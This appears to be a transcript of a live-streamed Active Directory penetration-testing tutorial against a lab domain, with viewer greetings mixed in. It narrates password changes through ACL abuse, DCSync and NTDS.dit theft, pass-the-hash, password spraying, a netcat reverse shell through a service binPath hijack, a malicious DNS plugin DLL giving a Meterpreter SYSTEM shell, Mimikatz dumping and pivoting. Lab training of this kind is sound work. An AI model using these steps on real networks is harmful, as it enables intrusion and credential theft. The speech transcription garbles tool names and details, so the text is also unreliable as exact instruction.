credentials. But it's saying invalid credentials. All right, so not really much we can do with that unless I reverse it somehow. I did not. TAC D. Yep, that looks like it's about it. So like I said, sometimes it works good. Sometimes LDAP domain dump works. Sometimes LDAP search works. So you always want to try both. And maybe invalid credentials, maybe because we have to do, nope, we're putting in that invoke.local like right there. I wonder if we have to do something like that. Didn't think so. Okay. So, oh wow. All right. Our next part of this is going to be BloodHound, right? So let's go ahead and make directory blood. And we'll cd in that blood, okay? Then we'll do a BloodHound Python. Okay, and we're going to do this for the domain of invoke.local. TAC U is going to be the username. The password for that user. TAC C all, that means gather everything, okay? We can say invoke here, or you also don't need the GC. We can also get rid of this if we want to. And then we'll go ahead and we'll throw in the IP address. And there we go. So that's now finished. So now to start up BloodHound, we can start up another terminal here. And we're just going to say sudo neo4j console. And then we're also going to do a BloodHound. And we're going to wait for neo4j to actually fully start up. We'll start up BloodHound, and then we'll move those over into BloodHound. So that's started. Okay, now we click on BloodHound. I have it on auto log on. All right, saves the password, goes in and logs in. If you already have something in here, you can go ahead and clear it. Going down to clear database. And then we can upload our data. So if I go to home, desktop, and this is WazeHell, BloodHound, get all those, open up all those, and this will start to open up everything for us. Thank you very much for the follow, Cyber Divers. Thanks a lot. What's up, Ascertainment Man? How you doing? I'm always good. All right, there we go. Okay. And now that we did that, let's go ahead and grab that user that we had, right? We got a couple of users now, correct? So if I head back over here, I can cat that asrep user, right? So I have Betty Carroll. We know we have her. So let's go ahead and head over here. We say Betty Carroll. Okay, right click, mark as owned. We also have, who's our next one? We have Betty Carroll right there, and we also have, Our user that we did this with, right? We have her. Okay, we can right click, mark as owned. There we go. We can start to analyze these different, or double click on this person, okay, and get some node info for them, right, and start to analyze them. So she has reachable high valuable targets. She has 10. Okay, she can PS remote into here, and it looks like she may be able to do a DC sync, or this machine can do a DC sync over invoke.local. We could always try it. All right, Civvy Shay. So she supposedly can talk over also to Civvy Shay, who was in the same group, right? We could try DC sync with her. We also see her first degree group memberships, what she's a member of. And IT admins, okay? First degree RDP privileges, group delegated RDP privileges, okay? So she can RDP into that stuff. All right, outbound, we have these transitive object controls and also group delegated object control. So she is IT admin, right? Has generic all permissions over her, okay? But I believe she was part of the IT admins group, I thought. All right, so there's 29 users in IT admins, it looks like. Direct members is 3. All right, who are those 3 members? Oh, she's one of them. So, and what do they have? They have generic all. IT admins have generic all over every single one of these users. So IT admins can actually technically change any one of these users, right? And do whatever they want to them. So if there's a domain admin in here somewhere, we could technically utilize this generic all, like right here, and try this targeted Kerberos attack, like right there. Or we could try to do a force change password for that person. Or we could try to do a shadow credentials attack. Strong shiv, it's going to take like a little bit because this is going to be part of a series. So we have all those, right? So let's go ahead and look back at our LDAP domain dump, or we can also just look at domain admin and see who's part of that group, right? So these are the 4 members. Nope. That's the groups like right there. Direct members. We have 1. Administrator is the only member of that group, huh? Obviously they can reach all the high value targets, like right there. All right, let's go and look up the IT admins because we know she's part of that, right? Or is that what we just looked up? Yep, that's what we just looked up, right? All right, transitive properties. So she has generic right over project management, member of domain users. Who's that? McGee. Okay. So we can pretty much get into any one of these groups over here, but this person has generic right over project management. So let's go ahead and check out Dusty Elizabeth here. All right. So we'll go ahead and we'll use that generic all against Dusty Elizabeth. We'll do a Linux abuse, and let's try this force change password. Let's see if we can do that like right here. So we have net RPC password. Our target user, right, is going to be Elizabeth. We need to give her a new password, PSNSW0RD, exclamation point. Attack U. Okay, domain invoke.local. Control user, and our control user. Thought we had a user pass.text, didn't we? Or did I already did I accidentally delete that? It's going to be her. With the password And then the domain controller invoke, well, we already got invoke.local, so probably that's most likely to be 192.168.0.73. Okay, looks like it worked. Let's go ahead and see. Okay, let's try crack map exec, WinRM, boom, and we'll try Dusty Elizabeth. And yeah, that 100% works. So we have just changed Dusty Elizabeth's password to PSNSSW0RD exclamation point. Okay, because we have those generic all privileges over her, and she has generic right over project management. So let's go ahead and see what we can do with that. We can pretty much do the same thing, and we can add a member to that group. So we can take any member we want, and we can add them to that group. Okay, so let's go ahead and we'll add in our, I don't know, our Azure roastable member. Okay, is that really going to do much for us? Probably not, but we'll go ahead and do that. So our cat Azure ropes user. Okay, so our targeted group is the group that we're allowed to write to, right? Which is going to be project management. Target user, the user that we want to add, Betty Carroll. Invoke.local. Controlled user is going to go ahead and be Dusty Elizabeth. Right? Now we have that person. Her password, which we already know it because we actually changed it. And then domain controller 192.168.0.73. Okay, now we can go ahead and we can check if that user actually got into that group. All right, utilizing that same like little thing right here, right click on it, help, Linux abuse. We can now check if that user is actually in. So let's go ahead and do that. Okay, then we just need that TACU and beyond. Let's go and see if Betty Carroll is now part of project management users. And it looks like she is. All right, easy day on that one, right? We've just added Betty Carroll to project management users because they have that generic right over that group membership. So if project management has something, you know, some type of crazy things that they could do, then, you know, we could do a lot of stuff with that, right? All right. So they have generic right over executives. So we can technically now generic right do the same thing again to executives, right? So let's go ahead and do that one more time. And this time we're literally just going to add the same member again. We're just going to keep adding Betty Carroll, right, into executives now. She's got some scope creep going on, right? There we go. Okay, we've now added Betty Carroll into there. And then we can check it, right? For executives. And she's in there. All right, cool. Let's go ahead and we have now pretty much, we marked that group as owned. We now have executives, right? And we're pretty much going to mark this group as owned. And they are a member of both remote desktop users and remote management users. And we can go ahead and mark that as owned also. Okay, it doesn't really look like they have anything too cool going on here. So that's about as far as we're going to get with that, it looks like. All right. And that's everyone on there. Okay. You're not going to see, obviously, the new people they put on there. It's not like this is updating as it goes, you know. So you could always run another BloodHound Python and then go from there. But supposedly, these executives, this machine can supposedly DC sync. So I'm wondering if she can actually do a DC sync attack now. And to do a DC sync attack, we do a secrets dump. I gotta look at my notes like real quick. It should just be domain. Yep, domain. And then everything else. So let's go ahead and try that like, real quick. And we'll try this Dusty Elizabeth like real quick. I don't think she's going to actually be able to do it, but we'll give it a try. Right. No point not giving it a try. Invoke.local. That's Dusty Elizabeth. Password 192.168.0.0.73. Okay, nope, nothing, right? That's okay. I believe whoever was IT admins, though, if we look at IT admins again, we go ahead and mark that as owned. I believe that they can actually do, they have generic all over Mari Nessie, who can DC sync. So let's go ahead and see what this generic all could do. We already know, right? We've already done it. Right, so let's go ahead and let's change Mayor Nessie's information, since we now have generic all over her, and finally be able to do that. What if we do a targeted curb roast attack? Do I even have targeted curb roast on here? Let's go ahead and try to find that. I'll say the other one's just easy, you know what I'm saying? So why wouldn't we? Oh, shutdown repo. This is a little old. It utilizes Impacket. We could try to grab it. I don't know if we actually have to put it in the Impacket folder or something like that. We can try to grab it though, and let's see if we can do it. It's definitely not around anymore, but let's go ahead and try it. We can supposedly do it, and I've definitely done it before. I've actually done it on invoke.local. Alright, invoke.local. Attack you. We have, let's see here, someone that's in the IT admins group. We need to figure out who's in there first, because I kind of forgot. So let's go ahead and see who's in IT admins, direct members. Lanai Morelli, right? Lanai. What did we change her password to? Pi password? Yep, we sure did. So it's her like right here. You want to try that? Oh, damn. Let's frick. Okay, there's Betty. Maggie. Wow. Mayor Nessie. Wow. Dusty Elizabeth. So we could try to crack all these now, right? I don't think we're going to be able to because a lot of these passwords are pretty hardcore. But here's that targeted curb roast attack now, isn't it? Let's fricking go. I wonder if we could put that out to a hash cat or something like that. Let's go and try Python targeted curb roast. Can I do an output file? I sure can. And can I do a format on this thing? Doesn't look like I can do a format. Okay, let's go ahead and try that again with a output file target.txt. There we go. Those are all 23s. I may be able to do a hash cat with that on target.txt. No hashes loaded. It's probably because it's not a hash cat format, huh? Probably John it. Probably do a John with it. Yep, there's one. Which we already do that one, right? And none of the other ones. All right. let's go ahead and try that netRPC, okay? Because now we know that that does work now. That's pretty freaking sweet. I kind of want to actually put that into my impact folder. Should be this guy right here. So I should be able to copy targeted Kerberos.py into opt in packet examples. We'll do a sudo because that's supposed to gotta be a sudo. I should just be able to do a targeted Forgot I could. Oh, it's already copied in there though. I was putting the wrong one. So maybe I should put it into, did I put it in packet or I put it in examples? I put it in examples, maybe I should put it into in packet. Maybe put it into both. Let's go and grab it and we'll put it into in packet also. Surprised that it's not pulling it. Huh. Surprised it's not pulling it. We'll figure that one out later. Alright, so we are going to try to change the password. If we go to IT admins, right? We go to our reachable targets, and we're going to utilize the member of, we're going to utilize Lene as the member, right? And we're going to utilize that target, right? Where is it? Reachable high value targets. And we're going to change the password for mayor utilizing Lene. Let's go and grab that. Who can then DC sync? Let's go ahead and do that. Okay, target user is going to be that linear target, right? And that is Mayor Nessie, M-A-I-R-N-E-S-S-I. Mayor Nessie. We'll throw her password into the same thing that we have been. Jeez, there we go. All right, there we go. The domain, invoke.local, controlled user, and that's going to be that Lene password. And then the IP address, right? Lastly, the IP address for the domain controller. Fill set password with error. No map between account names and SIDs was done. Huh? So obviously there was a problem with this generic all to that person. No mapping between account names and SID was done, huh? That's a new one for me. So obviously whenever this thing was actually set up, there was a problem with that, like right there. No mapping between account names and SIDs was done. Let's go ahead and see what that does, what that means like right there, because we may have to actually mess with the actual domain controller itself, right? I've seen a few problems with this thing so far. All right, thank you very much, Google, for that one. Let's go ahead and chat GPT it. How about that? Oh, I'm not logged in? Oh, whatever. I am now. Sure that has a valid user profile associated with sometimes issues with user profile leave such errors. Check permissions. Check SID. It's possible that there was an issue with the mapping the account name to its SID. This can happen if there are problems with the user's Active Directory or if there are conflicts with other accounts. Check for any conflicts or issues with the user's SID. Oh, there could be. I mean, that could be a thing, but I don't understand why it would be there. That would be the only other thing I could possibly see happening. Is that like right there? Is that it's saying that you can't change that password? I don't really understand what that would do for us though, since that user does have DC sync, and I feel like that would be the way in. And that was for Mayor Nessie, correct? She is a replication account. She is part of users, marketing, remote desktop users, remote management users. Okay. Or if we need to unlock the account. Try something like that. Okay, nothing. All right. She doesn't have anything special in here. Nothing special. So she has nothing special anywhere, right? Nothing at all special anywhere. Okay. There's no real group policies on this thing also. So I wonder if we should just change it in here now, because there's obviously an issue with this portion of it. So let's just go ahead and we're just going to reset her password because there's obviously an issue in here. So we're going to reset password. We'll put that at that password that we put it in. Yep. So we can obviously do it. And we put in the password that we had in before. So now we can now do that secrets dump over here. There are a couple problems with this thing I have noticed. Let's try secrets dump over here. And we're going to do our domain, right? Which is going to be invoke.local. Right. We're going to do our user. Because this is what happens if you have DC sync. At the IP address of 192.168.0.73. We can check that DC sync access real quick. We can go over here. We can right click on it. Help Linux abuse. And we can see that they could run a secrets dump. Let's go and head back over to here. Enter. And we can't even do that. The attempt to log on is invalid. That would do a bad username or authentication information. We know that I think this user's just jacked up. We know it's 192.168.0.73 now. It should be Mari.Nessie, right? Let me make sure that this is actually M-A-I-R was, I think, because that's a name, I guess. M-A-I-R. Okay, let's go ahead and do that, like right there. And that will change. If we put in the correct name, then we might be able to do it correctly. M-A-I-R. At least I proved that we should be able to do it. Let's go ahead and actually change the password just in case you guys think, he's cheating. 123 exclamation point. There you go, okay? And now we can do 1, 2, 3 exclamation point. Or, excuse me, not secrets dump 1, 2, 3. And now we're still having that, oh, MAIR. Jesus. Who named their kid that? Who named their kid that? That's the problem. All right, so we did our secrets dump now. And now that we did that secrets dump, we can now pass the hash and log in as the administrator. Okay, so let's go ahead and do that like real quick. So we'll do a crack map exec. We'll say SMB, tac help. We should be able to pass it hashes. And we should be able to try to log it with a hash, right? Wherever that's at. Continue access. Boom, boom. Let's go. Oh, capital H is hash. So we do crap map exec. Boom, boom, boom. Tac U administrator. Tac H is going to be that hash, right? And we have to do that for this password right here, or this IP address right here. All right, and we can see that yes, we 100% can get in. So from here, we can do a psexec.py, and we can say tac help, because this can also get us in with hashes. It should just be attack hashes. All right, so we can, from here, we can do a psexec.py. We can say domain. Hey, thanks a lot, ShellDread, for the file. We can say /administrator. As we can see, that is the local host administrator, right? He does not have invoke.local with him. And that's just the local host guy. So that's what we're going to do, /administrator. Gofrosloyo. I don't hear, huh? Gofrosloyo is also not talking. Add administrator. All right. We do administrator. Okay. At the IP address 192.168.0.73. Tac hashes. We're going to put in the colon, and then we're going to put in our hashes. Hello, ShellDread. How you doing? This is your first time in the stream. I could have swore, I think I've seen you before. Oh, did not like that hash, probably because I didn't put the whole thing in, because I forgot the 3 at the very beginning. And there we go. Okay, so now we psexec in, dir, and we can do whatever we want from here, right? Cool. Let's do a wmi-exec.py. Okay, same exact thing. Local host, so we're just going to do /administrator at 192.168.0.73. Tac hashes, colon, that guy right there. Now, why we're putting that colon, because it looks for the LM-NT hash. We're just putting in just the NT side of the hash. All right, there we go. And so we got in through that, right? We could also start to crack map exec. We could try different things, right? Like WMI, because that's a new one, right? 192.168.0.73. Tac U administrator. Tac H, put in that hash. I should really get that 3 in the very beginning here. Let's go ahead and do that like real quick, so I don't have to keep doing that. All right, we can see that we got a shell with that, okay? So we know that we can get in. And like we talked about before, with crap map exec, we do attack X. Who am I? Can I do that with WMI? I should be able to. Nope, I guess I cannot. I can do it with WinRM though. So we can say WinRM, attack X, who am I? All right, we see we're invoke administrator. Let's go ahead and do a who am I tac/all. Remember that tac X is for capital X for PowerShell, lowercase x is for command prompt. All right, we see that we have impersonate a client after authentication, which that'll also be another day when we start talking about getting in the machine and actually running exploits on DNS admins and things like that. So today we learned a little bit about crap map exec. We learned about let me see here. We did crap map exec. We did LDAP domain dump. We did, well, we tried LDAP search, but wasn't working with it. We could do an LDAP search now, most likely. We do an LDAP search. I don't know if we can actually put a hash in, though, for LDAP search. Would be sweet if you could, wouldn't it? Can you put a hash in for LDAP search? Like an NT hash? See, that would be freaking sweet. Prompt for bind password. Simple authentication. Okay, so nothing in there for that till authentication. All right. So we can do, but we learned about LDAP domain dump. We learned about BloodHound, right? We looked at BloodHound, started looking at how to enumerate users on BloodHound and find different information on BloodHound. From there, we learned about changing passwords with SMB password, right? If they had a password that needed to be changed on there, right? And we also learned about secrets dump and the net RPC and the different abuses that we could have with things like generic all, generic write, DC sync. I think that was pretty much all of them, right, that we had on this one. So that is going to be it for today. All right. Yeah, I think that'll be it for today. I think we've done enough for tonight. I feel like we did a lot. So let's go ahead. Is Theo still on? He is. Let's go ahead and raid /B7H30. And I will talk to you all later. Ascertainment, you have a good one. GoPro Slowyo, always good to see you. Shell Dread, you have a good one. Thanks a lot for stopping in. Strong Shiv, you have a good one. All right. Pressure's Up, have a good one. And I'll talk to you all later. Yeah, I mean, y'all have a good one, all right? And we should be on either tomorrow or the next night to continue on with this thing and start to look at the DNS admins, server operators, backup operators, impersonate client after authentication, and things like that. All right, I'll talk to you all later. All right, welcome to part 3 of the WazeHell Active Directory little thing we got going on here. So yesterday we talked about DC sync, we looked at BloodHound, right? We also did domain password spray with crapmap-exec and a couple other things. So today we're going to look at domain password spray.ps1 and we're also going to look at invoke DC sync.ps1. So we figured out that this user right here has DC sync privileges, correct? Remember we changed their password, everything like that. So let's go ahead and let's utilize this user and first off do a domain password spray. So we do an IEX IWR, use basic parsing, and we'll go ahead and we will do a 192.168.0.24, right, my Kali IP address with domain password spray.ps1. Now if we do that invoke domain password spray, we do attack, we say password. Now we put a bunch of people as P@SSW0RD exclamation point, right? So let's just go ahead and spray that just so we can actually see this work. And it might take a minute for it to actually go through. Might take more than a minute. There we go. And that finally sprayed it off, okay? So it found 31 total users were found, right? Created a list of users spray. Appears to be no lockout policy. Removing disabled users from the list. Found 31 total users. Removing users within one attempt of locking out from list and created a user list, right? So we did that and we get these users right here. Supposedly have the password of P@SSW0RD exclamation point. If you're wondering why mayor.nessie isn't on there, remember we made hers 123 exclamation point. We made it like that, right? And there we go, mayor.nessie. Okay, so she's doing one with that. If we go with that change me password, I don't know if any users even have that anymore. It was like that, I think. Okay, 0 users have that one. It might have been, yeah, it was definitely that, like right there. And yep, no users have that password anymore. So that is a domain password spray right there. Now we did see on BloodHound that Mayor Nessie was able to do that DC sync attack, which we used secret dumps yesterday for, right? Let's go ahead and let's actually grab invoke DC sync over here. And that's going to go ahead. It's going to put Mimikatz in memory, Powerview, and AD Recon to memory, and DC sync will be executed from the main invoke.local. We can say yes. It's going to export those NT hashes via DC sync. And we should see, there we go. We go to customer, DC sync, and there we are. We have all the hashes right there in a nice file for us. Okay. There's our LDAP portion of it right there. And I actually don't know what's in PTF. Let's go ahead and see it. There we are. Just the hashes alone by themselves. So that is a DC sync attack within Windows. So we could bring this back to ourselves, or we could utilize this to do a pass the hash, right? Welcome back. So we are looking at the end of WazeHell here. Let me go ahead and get my cherry tree opened up. And if you remember, we said that we were going to talk about server operators, DNS admins, and also backup operators, right? So let's go ahead and take a look at Betty Carroll, who has all three of those. So I'm already logged on to her, right? I do a who am I /all. Okay, we actually see SE backup privilege like right there. We can see that she's a backup operator, server operator, and she's also a DNS admin, wherever that's at. There we go, DNS admin. All right, so she is all of those like right there. Okay, so let's go ahead and let's start to exploit those like right there. And this is the final part of WazeHell. And we do have another one that's called like water something, and we'll probably go do that one next. So let's go ahead and exploit the rest of this. So we'll start off with, let's say, backup operators. All right, so for backup operators, what we're going to do is we can go ahead and we can utilize the disk shadow method. So we're going to grab a script like this, like right here, okay? This script is actually on my GitHub. I think it's like backup script or something like that. But you can grab this script like right here. Yes, you do need those X's at the end of it. Okay, X at the end of each thing. Hit enter. We cat that script. There it is, okay? And let's go ahead and we can move that script up to here. Okay, so let's go ahead and do that with SMB, right? Go ahead and throw SMB, and then we'll copy from 192.168.0.24, that's my machine, /share/script.txt. Okay, there we go. So if I dir up here now, we have that script.txt. Okay, to continue on our exploitation of backup operators, we can now do a disk shadow. Now, a little background on this of why we're doing this, all this like right here. So backup operator, it can pull the NTDS information. The problem is that that's always being used. So if it's being used, you can't copy it right there at that time. What we can do is we can create a disk shadow of it. And that's what we're going to do here. Okay, so we're going to do a disk shadow. And that'll actually start to write everything over. Okay, so if we look at that disk shadow, what we did, right, is we made an E drive on here. Okay, so we actually made an E drive. All right, so if we look at this again, we can see like right here that we're going to create add volume C alias CD drive, create expose C drive to E. So all we did was just copy we made a disk with a disk shadow of the C drive and made it in the E drive. So now if we see it in the E drive, this is not being used at this time. So we can grab information off of here. So that's how backup operators actually work. We backed up the system to the E drive that we created, okay? And then from here, we can go ahead, we can copy the E Windows NTDS to C Windows temp. So I got the C drive going back CD back into C temp. We're not going to go into Windows temp, we're going to C temp, all right? We'll go ahead and we'll copy this, like right here. And what we can do is we can go ahead and robocopy now from the E drive Windows NTDS to right here, calling it Ntds.dit. So if we do a dir, we should now have an Ntds.dit in here. Awesome. And then we can do the same exact thing with system. Okay, reg save system, and that's going to be in ctemp system. Remember, I already am in ctemp, so we could have just did a period. But there we go, dir, and we now have the system on here. So now we now have ntds and system on our machine. Okay, now from here, all we have to do is bring that ntds.dit back to us and the system, and then from there we can go ahead and we can crack that locally with secret dump again. So let's go ahead and do that. So we will copy. It's 192.168.0.24. All right. /share /ntds.dit. Okay, should be just that, like right there, right? Oh, we actually want to get rid of that. We want to copy ntds.dit to there. And I'll show you a couple ways to do this. Okay, we can copy it. What else we can do? Let's see if we got that in there. That is save size. Okay, now let's use something else, right? Let's go ahead and download it, right? Let's go ahead and do a download, or yeah, download system. Okay, and that should just save that thing. We should start seeing system over here. Their system. So we can also do like that too, right? And this is going to download to whatever directory you're in. So if we do this, right, we are a desktop WazeHell. So we can see that we have that system and that ntds.dit. All right, so this is going to go ahead and download that. We'll let that download for a minute. Now, sometimes you have to do this a couple times. And as you can see, it does take a minute to do, but that's okay. What's up, Ascertainment? How you doing? Wonderful day today, isn't it? We're finishing up with WazeHell, like right here. I think we exploited enough. We got what, DC sync. We did get changes. We did SMB passwords. You know, I think we did brute forces. We did default passwords. I mean, we did ASREP roasting. I'm pretty sure we did, a lot on here. So now we have that, LSTAC LA. We can go ahead and we can now do a secret dump, right? System is going to be system, right? That's what we called it. Ntds.dit is ntds.dit. Ntds is ntds.dit. And then lastly, it's local to our machine, right? So go ahead and do that. And even though this user is not an admin, they're a backup operator, so we were able to grab everything out of here. All right. And drop it just like you normally would. And from there, we could do a pass the hash or whatever else we want to do to get out of the system, right? All right, awesome. So that is backup operator. Let's go ahead and look at server operator now. All right, so if it's a server operator, they can use VSS bin path. So what we're going to do is we're going to get NC64 on the box, okay? So let's go ahead and let's actually just, we can use my tools that I have. So we can go ahead and do a IEX IWR use basic parsing HTTP 192.168.0.24 / invoke tools.ps1. Let's go ahead and cd into tools. This also is on GitHub. Python 3 HTTP server. Okay, then we can do an invoke tools attack lhost, and that's going to be 192.168.0.24, right? My Cali IP address. This can go ahead and this is going to download a whole bunch of stuff. Since that ctemp already exists, we know that, so that's fine. All right, this also does run a couple Mimikatz commands, power up, invoke all checks out power up. So if obviously you see a bunch of errors, things like that, you're good. As long as you have what you're supposed to have from over here, and it did download everything, then you're going to be good. But we did download NC64, as you can see. It's also running Mimikatz too, so just tries to run just in case. All right, we do a dir now. We just got a lot more stuff in here, right? There's our nc64.exe. All right, so now what we're going to do is we're going to tell it that excuse me, we can type in services. We can see if we can even see the services. Okay, we can, cool. Let's go and exit out here. Let's see what services we see. We're not seeing VSS, but hopefully we can do it with VSS. We'll see. All right, let's go and head back over here. And what we're going to do is VSS should pretty much always be running. We're actually going to say ctemp. So we're going to say sc.exe, all right, config VSS bin path, all right, and we're going to call for netcat. We're going to say, hey, I want to open up a command prompt on this IP address at that port 0.24, all right, and we can go ahead and listen there. Port 443, and let's see what we get here. All right, it says success. Okay, now that's a good thing, obviously. All right, now what we have to do is stop the service VSS and then start the service VSS. So stop service VSS and then start service VSS. And where do you think it's going to go? Once it starts up, it's going to run this command like right here with those arguments and everything else. And there we go. Who am I? And we are NT authority system. All right, so that is server operator. So you can see how quickly that can get out of hand and how bad that could be for somebody, right? All right, the last one we have is DNS admins, right? So we do have DNS admin here. All right, so let's go ahead and let's create a server level plugin.dll with MSF Venom. So we're going to do an MSF Venom Windows. This one's calling for interpreter shell. We'll go ahead and we'll open up interpreter down here. Right. It's like bothering me how it's just highlighted. But we're going to do an MSF Venom Windows 64 interpreter, so we can go ahead and we can set our payload to this. Or set use exploit multi-handler. Set payload to this. Set our L host to 192. Set our L port, we'll say 445. All right, and let's go ahead and run this. 192.168.0.24 with an L port of 445. And that's going to make that DLL, that server level plugin, that DLL. We'll go ahead and type in run down here. Oh, that's going to be kind of hard, so we'll do run down here. And then we'll go ahead and we will start up a Python server, right? And we'll do a wget, use basic parsing. Yet again, another way to be able to parse files. 168.0.24 / server level plugin. And then tac O to save it as server level plugin.dll. All right. Next thing we're going to do is we're going to say DNS command, right? So we want to run this command like right here. DNS command for localhost config our server level plugin, and then tell it where to find that server level plugin at. And ours is going to be at ctemp, right? We want to load this one like right here. Okay, server level plugin. Registry was successfully reset. Awesome. Okay. Then from here, we need to stop DNS and start DNS. We are running, we do have a listener running. So if you're an evil WinRM, you do have to do this with, because if you do a stop service, we can try it. Oh, okay. Sometimes that doesn't work. So if that doesn't work, you can go ahead and do a command /c sc stop DNS. Okay. Now let's try start service. DNS. All right, sending the stage payload, interpreter, get UID, and we are NT authority system. So there we go. All right, that's quite a few different ways. Now that we have this interpreter shell, let's go ahead and get a little bit deeper, right? So we can do a get load kiwi. Okay, we can also PS, and we can migrate to something else, right? So we should be able to migrate somewhere else. Let's go ahead and try to migrate, I guess, to Explorer. Okay, that's 4372, right, for our process ID. So we'll go ahead and we'll try to migrate to whatever that was, 4372. See if we can. And we do. Okay, so now even if this is stopped again, doesn't matter because we are now this interpreter shell. All right, so from here, we're still good. Even if we lose this connection or whatever else, doesn't matter because we had that interpreter shell, right? Or we migrate over to that explore.exe. Let's go and load Kiwi. Oh, already been loaded, okay. We hit question mark, and we have all of this stuff in here, so we can go ahead and we can do a creds all. All right. Not running a system. Ooh, I went back to administrator. So let's just go ahead and do a quick, since we're running as administrator, we can go ahead and we can do a get system. At least hopefully we can. And we do. Creds all. All right. If I do a get UID, I'm now into authority system. Since that was administrator like right there. So there's the administrator hash like right there. All right. We can also do an LSA dump secrets. LSA dump SAM. Okay, so we can dump the SAM in secrets just like we could with secrets dump, or we can also do that with secrets dump, right? There's some more stuff that we can do in here also. So pretty much everything in here we can now do. Okay, so that's pretty cool, right? Another thing we can do is we can also turn on RDP. We can start key scanners, which is a pretty cool one like right there. I've shown that before, the key scanners and things like that. We can go ahead and we can get onto a shell on the system. So you type in shell, and then we can type in PowerShell, and there we go. Now we have PowerShell on the system, right? And then if we terminate it, we go right back to that interpreter, so we don't have to worry about losing it, right? So that's good for us. Do a PWD, where am I right now? We can CD. There we go. We just CD to C drive. Okay, and we can do really whatever we want. You also notice that it does show the hidden files in here too. So that's good for us, right? And that, I think, is going to be it. There's not really much else in this box. I do have a secondary, so if I do a IP config on it, we do have this secondary IP address, which I could show you guys if I go to PowerShell. I already have a video on pivoting and things like that, but I don't have this script yet, so we can bash tools@golo setup.sh. All right, the network is 10.0.0.0/24. This is also on GitHub, if you haven't noticed yet. Okay. Oh, sitting in tools and do that same exact thing again. Okay, there we go. And then we can actually do a, let's go and CD into tools. Let me go in ls tac la grep for invoke. I think I called it Legolo. Or did I call it Legolo quick start? Legolo quick start.ps1. Okay, so we'll go ahead and we'll do a Python 3. Okay, we do a Legolo quick start. Now I believe we can also download from here too. So let's say we didn't actually want to put it in here like that. We can exit, question mark, and I believe we can actually download from here. Download, or is that, it's going to be upload, excuse me, upload home Kali tools. That'll go a quick start. And there we go, okay? So if I do a dir, there it is like right there. So we could also do it like that too. Okay. Or we can go to PowerShell. All right, or we can run PowerShell commands, excuse me. I always forget how to do this one though. I always have to look it up how to run PowerShell commands. But I think we gotta load up a different little thing there. So yeah, I think we gotta load up another little thing there. So let's go into shell, PowerShell. We can also do an IAX, right? IWR, use basic parsing. Then from here, we can run that Legolo quick start. So we can say invoke Legolo. And if you don't know, we can always cat that Legolo quick start. Right, you look at the very top, invoke Legolo, and we do need L host. Attack L host, which could be myself, 192.168.0.24. All right, temp already exists, that's fine. And this also goes to try to download that agent. All right, and then it runs it like this. So, and this one up here does do a self-signed cert. Okay. And now we just kind of wait. It might take a minute, but there we go. And if I do a session or sessions, we have our session link right there. So now we're now connected to session 1. If I do a start, okay, also if I do an IP route, you can see that I added the route in there, right? So now we had that other, I can do an IF config over here, and we see that that 10 network is on there, 10.0.0.50. So let's go ahead and do an mmap TACP 445 on 10.0.0.50, and that is open. So I'm now reaching the internal network. So that's how Ligolo works. What's nice about Ligolo, okay, is that it's a tunnel, so it moves much faster than just a regular proxy. So we can actually rust scan. That's what makes Ligolo really nice, like right there. All right. So I hope you guys learned something throughout. I think this video is like 3 hours long. I hope you guys learned something throughout this. I hope it was entertaining. I hope it was enjoyable. And yeah, let me know, and I will talk to you all later.